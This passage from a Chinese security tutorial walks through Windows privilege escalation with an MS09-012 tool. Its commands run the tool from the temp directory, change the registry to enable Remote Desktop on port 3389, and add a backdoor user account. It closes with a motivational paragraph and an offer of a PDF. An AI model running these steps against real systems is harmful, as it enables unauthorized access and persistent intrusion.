第三步,查看漏洞补丁信息
第四步,上传漏洞工具
将提权工具( 此处使用MS09-012漏洞工具 )上传到系统中,windows系统的回收站和c:\windows\Temp目录默认具有上传和执行的权限
第五步,利用工具进行提权
payload
/c c:\windows\temp\pr.exe "whoami"
第六步,开启远程桌面端口
命令行查看是否开启3389( 远程桌面 )端口
/c c:\windows\temp\pr.exe "netstat -ano"
上传a.bat文件至c:\windows\temp目录下,内容为开启3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
执行a.bat文件,开启3389端口
/c c:\windows\temp\pr.exe "c:\windows\temp\a.bat"
查看3389是否开启成功
/c c:\windows\temp\pr.exe "netstat -ano"
第七步,添加管理员权限用户
添加普通用户tom
/c c:\windows\temp\pr.exe "net user tom 123456 /add"
## 写在最后
**在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。**
需要完整版PDF学习资源私我